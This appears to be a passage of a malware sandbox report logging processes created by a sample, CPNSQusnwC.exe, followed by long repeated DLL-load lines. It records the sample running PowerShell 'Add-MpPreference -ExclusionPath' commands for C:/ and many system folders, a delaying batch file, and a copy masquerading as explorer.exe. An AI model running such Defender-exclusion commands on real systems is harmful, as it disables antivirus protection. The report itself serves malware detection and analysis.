                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qWYjuUdv6Q.bat"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe "C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe"
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
